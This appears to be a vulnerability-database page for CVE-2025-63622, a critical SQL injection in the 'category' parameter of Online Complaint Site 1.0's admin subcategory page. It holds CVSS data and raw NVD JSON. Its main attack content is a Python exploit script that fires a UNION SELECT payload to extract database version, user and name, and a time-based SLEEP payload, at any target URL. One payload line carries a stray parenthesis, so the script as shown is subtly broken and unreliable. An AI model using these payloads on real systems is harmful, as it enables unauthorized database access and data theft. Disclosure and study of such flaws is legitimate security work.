Security Vulnerability Report
中文
CVE-2025-63622 CVSS 9.8 CRITICAL

CVE-2025-63622

Published: 2025-10-29 15:15:45
Last Modified: 2025-11-03 18:35:04

Description

A vulnerability was found in code-projects Online Complaint Site 1.0. This issue affects some unknown processing of the file /cms/admin/subcategory.php. This manipulation of the argument category causes SQL injection.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fabian:online_complaint_site:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Online Complaint Site 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-63622 PoC - SQL Injection in Online Complaint Site 1.0 # Target: /cms/admin/subcategory.php # Parameter: category def exploit_sqli(target_url, payload): """ Exploit SQL injection vulnerability in category parameter """ # Prepare the malicious request params = { 'category': payload } try: response = requests.get(target_url, params=params, timeout=10) return response.text except requests.RequestException as e: return f"Error: {e}" def main(): if len(sys.argv) < 2: print("Usage: python cve_2025_63622.py <target_url>") print("Example: python cve_2025_63622.py http://target.com/cms/admin/subcategory.php") sys.exit(1) target = sys.argv[1] # Payload to extract database version payload = "1' UNION SELECT NULL,version(),user(),database()-- -") print(f"[*] Testing SQL injection on: {target}") print(f"[*] Payload: {payload}") result = exploit_sqli(target, payload) print(f"[+] Response:\n{result}") # Blind time-based injection payload blind_payload = "1' AND SLEEP(5)-- -" print(f"\n[*] Testing blind injection with: {blind_payload}") result = exploit_sqli(target, blind_payload) print(f"[+] Response: {result[:200]}...") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63622", "sourceIdentifier": "[email protected]", "published": "2025-10-29T15:15:44.963", "lastModified": "2025-11-03T18:35:04.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in code-projects Online Complaint Site 1.0. This issue affects some unknown processing of the file /cms/admin/subcategory.php. This manipulation of the argument category causes SQL injection."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:online_complaint_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "52A830BB-2DB8-4016-804F-98E6537BA087"}]}]}], "references": [{"url": "https://github.com/xmqaq/cve/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/xmqaq/cve/issues/2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}